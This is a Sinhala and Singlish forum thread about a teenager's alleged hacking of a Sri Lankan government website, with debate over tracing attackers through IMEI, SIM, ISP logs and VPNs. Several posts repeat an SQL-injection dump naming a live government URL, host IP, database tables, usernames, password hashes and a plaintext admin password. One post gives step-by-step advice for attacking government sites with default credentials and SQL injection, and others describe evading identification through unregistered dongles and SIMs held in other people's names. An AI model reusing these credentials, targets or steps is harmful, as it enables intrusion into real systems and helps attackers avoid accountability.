ලොල් සීන් එක. .
ෆෝන් වලට විතරක් නෙවෙයි ඩොන්ගල් වලට රවුටර් වලට IMEI තියෙනවා. .
හැමතැනම පකයෝ වගේ කියෙව්වාට අර අවුරුදු 17 පොඩි එකාගේ දැනුමෙන් අරික්කාලක් නෑ මේ ඉන්න සමහර ගොබ්බයොන්ට...





ලොල් සීන් එක. .
ෆෝන් වලට විතරක් නෙවෙයි ඩොන්ගල් වලට රවුටර් වලට IMEI තියෙනවා. .





trace කරන්න පුලුන්. dynamic ip උනත් isp ල ගල ඒ ඒ ip එක අදාල වෙලාවේ asign වෙලා තියෙන්නේ කාටද කිනඑක log වෙනව. මේ ලොග් ගොඩක් ලොකු ඒව. උසාවි නියෝගයකින් මේව ගන්න පුලුවන්, public wifi or ip ටනල් එකක් යූස් කරොත් අමාරු වෙනව. ප්රොක්සිය පිටරටක එකක් නම් එයාලගෙන් අපේ රියල් Ip එක ගන්න ලේසි නෑ. ඒ වගේම අදාල ip අසයින් වෙන ඩිවයිස් වල විස්තරත් එයාලගේ ලොග් වල තියෙනව.

මෙහෙම කියන්නම්කෝ. .
IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .
දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ?![]()
මෙහෙම කියන්නම්කෝ. .
IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .
දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ?![]()

මෙහෙම කියන්නම්කෝ. .
IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .
දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ?![]()

හැමතැනම පකයෝ වගේ කියෙව්වාට අර අවුරුදු 17 පොඩි එකාගේ දැනුමෙන් අරික්කාලක් නෑ මේ ඉන්න සමහර ගොබ්බයොන්ට...








අල්ලගත්ත ක්රම ටික පොඩ්ඩක් දන්න එකෙක් කියපන්කෝ. . මට මතක මේ ටික තමයි. .
IMEI නම්බර් එක හරහා ලියාපදින්චි පුද්ගලයව සොයාගැනීම. .
ෆෝන් නම්බර් එක හරහා පුද්ගලයව සොයාගැනීම. .
IMEI නම්බර් සහිත ෆෝන් එකෙන් සහ සිම් එකෙන් කෝල්ස් ගත්ත නම්බර්ස් හරහා පුද්ගලයව සොයාගැනීම. .
රීලෝඩ් දමන අවස්තාවක ඒ රීලෝඩ් දමන ස්තානය හරහා පුද්ගලයව සොයාගැනීම. . (සී.සී ටී.වී මගින් හෝ වෙනත් ක්රම මගින්)
ඔය විදි වලට අනුව නම් IMEI නම්බර් එක තමන්ගේ නමට නැත්නම්. .
සිම් එකත් තමන්ගේ නමට නැත්නම් තමන් අදුනන අයට කෝල්ස් අරනුත් නැත්තන්. .
රිලෝඩ් දාපු විදිය හොයාගන්නත් නැත්තන්. .
ඉන්ටර්නෙට් බවිතයේදි අයි.පී වෙනස් කරලා ඉන්ටර්නෙට් ගිහින් නම් කරපු කෙනාව හොයන්න විදියක් නෑ නේද?
මට අමතක වෙච්ච දෙයක් තියේද?![]()
මචං අපි vpn එකකට කනෙක්ට් වෙන්නෙත් අපේ isp අපිට දෙන ip එකෙන් නිසා කොයිවෙලෙත් isp දන්නව ip එක. නමුත් අපි vpn එකට කනෙක්ට් වෙලා වෙබ් එකකට යනකොට වෙබ් එකේ ලොග් වෙන්නේ අපිට vpn එකෙන් දුන්න ip එක. සෝ ඒනිසා ප්රයෝගිකව බැහැ පුද්ගලයව අදුන ගන්න.
ඒ වගේම ඩොන්ගල් එක , රවුටරේ තියන ගියෝ ලොකේෂන් එක එක isp ට ගන්න පුලුවන් ඕන වෙලාවක. ඒත් වෙබ් එකේ රෙකෝඩ් වෙන්නේ vpn ip එක නිසා ඒ අනුව ට්රැක් කරන්න බෑ.
ගොඩක් රටවල මේ කේස් එක හින්දම vpn බාවිතය තහනම් කරල තියෙන්නේ. vpn එකකට කනෙක්ට් උනා කියල ඩිටෙක්ට් උනොත් කනෙක්ෂන් එක කපනව එවෙලම හෝ ඇක්ටිවිටීස් ටික කාලයක් ට්රැක් කරල අනවශ්ය වැඩ කරල තිබ්බොත් නීතිමය පියවර ගන්නව.
මෙහෙම කියන්නම්කෝ. .
IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .
දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ?![]()
)mehemath puluwan, Web site eka Hack karapu time ekai, E welawe VPN walata Log una IP tikai analysis karala hoyanna puluwan,Lankawe Wadiya VPN use wenne nathi nisa. Lankawa wage Podi rataka karanna puluwan, But Loku ratawala VPN Sahena Use karana Ratwala Oka karanna amarui.

###########################
# Host IP: 184.173.17.142 #
# Web Server: Apache #
# DB Server: MySQL >=5 #
###########################
Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'
*Current DB: presiden_db
*Tables Name: Columns
writings
users -------> timestamp email userlevel userid password username
speeches
pre_users -------> userLevel password userName userID
pre_news
pre_events
photogallery
photoalbumtitle
photoalbum
inter
homeimage
banned_users
active_users
active_guests
*Data:
username password email userlevel
useronly b420243d6f14831b8a1098ee10fb0450 [email protected] 1
admin 8a8644842043beaf6fa725e1b71675b3 [email protected] 9
userName password UserLevel
admin gvt123 1
කස්ටම් php එකකින් තමයි photo album view කරන්න හදල තියෙන්නේ. cms වල අනම් මනම් Plugins දාල නැත්නම් by default sql injection වලට ආරක්ෂාව තියෙනව. Location eka Hoyaganna puluwan Log wena

Sim eke ayithikarayagen ahanawa katada connection aran dunne kiyala![]()

මචං අපි vpn එකකට කනෙක්ට් වෙන්නෙත් අපේ isp අපිට දෙන ip එකෙන් නිසා කොයිවෙලෙත් isp දන්නව ip එක. නමුත් අපි vpn එකට කනෙක්ට් වෙලා වෙබ් එකකට යනකොට වෙබ් එකේ ලොග් වෙන්නේ අපිට vpn එකෙන් දුන්න ip එක. සෝ ඒනිසා ප්රයෝගිකව බැහැ පුද්ගලයව අදුන ගන්න.
ඒ වගේම ඩොන්ගල් එක , රවුටරේ තියන ගියෝ ලොකේෂන් එක එක isp ට ගන්න පුලුවන් ඕන වෙලාවක. ඒත් වෙබ් එකේ රෙකෝඩ් වෙන්නේ vpn ip එක නිසා ඒ අනුව ට්රැක් කරන්න බෑ.
ගොඩක් රටවල මේ කේස් එක හින්දම vpn බාවිතය තහනම් කරල තියෙන්නේ. vpn එකකට කනෙක්ට් උනා කියල ඩිටෙක්ට් උනොත් කනෙක්ෂන් එක කපනව එවෙලම හෝ ඇක්ටිවිටීස් ටික කාලයක් ට්රැක් කරල අනවශ්ය වැඩ කරල තිබ්බොත් නීතිමය පියවර ගන්නව.
IMEI num eken neme machan mama hithanne.
mewage dekadi mulinma hack krapu eka traces thiyala gihin da kiyala balanna ona. samanyen hack ekakadi wena crime ekakadi wagema traces thiyanwa. wisheshayenma connect una ip wala log ekak thiyanwanam saha mu connect wela thiyenne ip spoofing kranne nathuwanam lesiyenma hoyaganna puluwan.
IMEI thiyene cellular device walata witharai. u hack eka kare mobile connection ekakinnam oeka hoyaganna puluwan machan mokada IMEI details walin ownner hoyaganna puluwan.
ehema nathiunath ip eka hide kre naththam isp ge dynamic ip assign krapu log eke muge wisthara thiyanawa.
godakwita oken thamai mattu wenna aththe. podi ekek hinda othanin mattu wei kiyala lokuwata hithanne nathuwathi.
kohomath oya godak government sites hadala thiyenne icta eken hari commis kuttiya dena podi IT company hari. icta eketh godakwelawata trainnees la wage thamai owa develop kranne, mokada lokko ice para ne. oya godak sites walata lesiyenma sql injection krnna puluwan.
mama issara elakiri hari wena kohe hari net eke thread ekakuth dakka mathakai exam dept eke website ekata sql injection krana hati.
godak welawata okun site hadanne framework walin. ithin username thiyenne defaul ewamai. login url wenas krnne na. security monitor karanne na.
(website dev waladi security kiyanne wenama paththak, dev krnna wage welawak yanwa hond site ekaka securtiy walata)
ithin oka hack kranawa kiyanne maha loku deyak nemei samanya danumak thiyana ekekta.
owa karana ewun promote krana ekanam honda wadak nemei. habai ethical hacking gana awabodayak dunnata kamak na.
worpress, joomla, cakephp, drupal wage frameworks danna un innawanam onnnam nikamata governemnt site tikakata gihin try ekak deepan.
1) mulin balapan site ekaka dev krapu framework eka mokakda kiyala. html source eka balala danna ekekta oka hithaganna puluwan.
2)admin ekata, sql server (phpmyadmin most of the time), web server ekata ehema log wenna puluwanda balapan. wisheshayenma server ekata ftp wenna puluwanda kiyala.
3) samanyen hama web server ekakama, db ekakama default password ena widiyak thiyanwa. eka gahala balapan. (eg: phpmyadmin databases username is root and password is empty. in postgresql, most of the time username is postgres, in wordpress admin try admin, admin or admin, password................like that)
4) ehemath barinam sql injection ekak deela balanna. youtube eke onatharam turorial thiyanwa
5) mama me kiwe o/l mattame eekta unath lesiyen kranna puluwan dewal tikak. thawa advanced widi thiyanwa, owa dala hire yanna wei. eth godak government website wala oya basicma tikawath setup wela na.![]()
awul thiyanwanam unta call ekak deela kiyapan. balu wada krnna epa. tamnge rate dewal ne.

they trace the usage.
Have you ever read google or face book agreement. ( I'm also not)
what activities they had done through this sim
Code:########################### # Host IP: 184.173.17.142 # # Web Server: Apache # # DB Server: MySQL >=5 # ########################### Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233' *Current DB: presiden_db *Tables Name: Columns writings users -------> timestamp email userlevel userid password username speeches pre_users -------> userLevel password userName userID pre_news pre_events photogallery photoalbumtitle photoalbum inter homeimage banned_users active_users active_guests *Data: username password email userlevel useronly b420243d6f14831b8a1098ee10fb0450 [email protected] 1 admin 8a8644842043beaf6fa725e1b71675b3 [email protected] 9 userName password UserLevel admin gvt123 1
Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'
ඔය තියෙන්නේකස්ටම් php එකකින් තමයි photo album view කරන්න හදල තියෙන්නේ. cms වල අනම් මනම් Plugins දාල නැත්නම් by default sql injection වලට ආරක්ෂාව තියෙනව.
අනික බලන්න යූසර් නේම් එක හෙනම කොමන්
අනික password hashing algo එකත් හෙනම පරන එකක්, md5 ද කොහෙද, දැනට හොදම blowfish slow password hashing algo එක. ඒකේ characters 60 ක් තියෙනව.
ගොඩක් gov sites ඔහොම තමයි.
ඔච්චර දගලන්න දෙයක් නෑ Jekyll වගේ static generator එකක් යූස් කරානම් කිසි කරදරයක් නෑ.

Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'Code:########################### # Host IP: 184.173.17.142 # # Web Server: Apache # # DB Server: MySQL >=5 # ########################### Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233' *Current DB: presiden_db *Tables Name: Columns writings users -------> timestamp email userlevel userid password username speeches pre_users -------> userLevel password userName userID pre_news pre_events photogallery photoalbumtitle photoalbum inter homeimage banned_users active_users active_guests *Data: username password email userlevel useronly b420243d6f14831b8a1098ee10fb0450 [email protected] 1 admin 8a8644842043beaf6fa725e1b71675b3 [email protected] 9 userName password UserLevel admin gvt123 1
ඔය තියෙන්නේකස්ටම් php එකකින් තමයි photo album view කරන්න හදල තියෙන්නේ. cms වල අනම් මනම් Plugins දාල නැත්නම් by default sql injection වලට ආරක්ෂාව තියෙනව.
අනික බලන්න යූසර් නේම් එක හෙනම කොමන්
අනික password hashing algo එකත් හෙනම පරන එකක්, md5 ද කොහෙද, දැනට හොදම blowfish slow password hashing algo එක. ඒකේ characters 60 ක් තියෙනව.
ගොඩක් gov sites ඔහොම තමයි.
ඔච්චර දගලන්න දෙයක් නෑ Jekyll වගේ static generator එකක් යූස් කරානම් කිසි කරදරයක් නෑ.
උඹ ඔය විස්තර දාලා හදන්නේ මේකේ උන්වත් හිරේ අරින්නද![]()

තොත්ත බබා;20606709 said:අහුවෙන්නේ නැති වෙන විදිහට කරානං තමා වැඩ්ඩ වෙන්නෙ

dan oka u kara kiwwama podi piliganimak tiyanawane ban..nathnam u oka kara kiyala kawda danne..ilanga para u ahuwenna nathi wenna karai wena ratakata gihin.![]()